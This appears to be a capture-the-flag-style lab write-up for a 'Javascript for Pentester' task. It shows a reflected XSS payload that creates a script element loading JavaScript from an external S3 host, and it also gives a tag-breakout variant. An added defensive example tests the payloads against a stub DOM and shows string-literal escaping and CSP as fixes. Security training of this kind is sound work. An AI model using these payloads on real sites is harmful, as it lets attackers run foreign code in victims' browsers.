Hello Pentesters, today I am going to post another solution to a task from Javascript for Pentester at Pentester Academy. In this task, we will learn how to include external JavaScript, which gives us unlimited space for code. You can view solutions to the other tasks here.
Task 10: Include External JS using JS | Task Link
This task is the same as the last one, with a little twist: we cannot inject in the way we did earlier. When we enter some text in the input box and view the source code, we notice that the text is already wrapped inside a <script> tag. We could close that script tag, open another script tag and provide the JavaScript source there, but we will do it a different way.
var scr = document.createElement('script');
scr.src = "http://demofilespa.s3.amazonaws.com/jfptest.js";
scr.type = 'text/javascript';
document.getElementsByTagName('head')[0].appendChild(scr);
The injection point is the same “url” parameter as in the previous tasks. Copy and URL-encode the code provided above and paste it after the ‘url’ parameter in the URL bar. This code creates a new script element (scr), sets its source to “http://demofilespa.s3.amazonaws.com/jfptest.js”, sets its type to “text/javascript”, and finally adds the new script element to the head of the page, so that the JavaScript loads before the rest of the body executes.
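The same injection seen from the defender's side, as an added example that is not part of the original post or the lab's code: it runs the payload against a stub DOM and shows that emitting the parameter as an escaped JavaScript string literal stops both the DOM-based include and the close-the-tag variant. `renderVulnerable` is an assumed reconstruction of how the task page reflects the parameter; every function name here is hypothetical.

```javascript
// Added example. Function names are hypothetical; renderVulnerable is an
// assumed reconstruction of how the task page reflects the "url" parameter.
const SRC = 'http://demofilespa.s3.amazonaws.com/jfptest.js';
const DOM_INCLUDE = "var scr = document.createElement('script'); " +
  'scr.src = "' + SRC + '"; scr.type=\'text/javascript\'; ' +
  "document.getElementsByTagName('head')[0].appendChild(scr);";
// The variant the post mentions but does not use: close the tag, open another.
const TAG_BREAKOUT = '</script><script src="' + SRC + '">';

// Vulnerable: the parameter lands inside <script> as code.
function renderVulnerable(urlParam) {
  return '<script>' + urlParam + '</script>';
}

// Hardened: emit the value as a JS string literal and escape the characters
// that could close the <script> element or break the literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}
function renderHardened(urlParam) {
  return '<script>var url = ' + jsStringLiteral(urlParam) + ';</script>';
}

// Stub DOM that records the src of every element appended to <head>.
function stubDocument(loaded) {
  const head = { appendChild(el) { if (el.src) loaded.push(el.src); return el; } };
  return {
    createElement: (tag) => ({ tagName: tag, src: '', type: '' }),
    getElementsByTagName: () => [head],
  };
}

// Split the HTML the way a parser does (a script block ends at the first
// "</script"), run each inline body on the stub, return the URLs loaded.
function externalLoads(html) {
  const loaded = [];
  for (const [, attrs, body] of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script/gi)) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    if (src) { loaded.push(src[1]); continue; }
    try { new Function('document', body)(stubDocument(loaded)); } catch (e) { /* invalid JS loads nothing */ }
  }
  return loaded;
}

for (const input of [DOM_INCLUDE, TAG_BREAKOUT]) {
  console.log('vulnerable:', externalLoads(renderVulnerable(input)),
    'hardened:', externalLoads(renderHardened(input)));
}
```

A Content-Security-Policy whose script-src allows neither inline script nor the third-party host is a second layer if the reflection bug is still present.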
That’s all. Use this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided on the Pentester Academy website.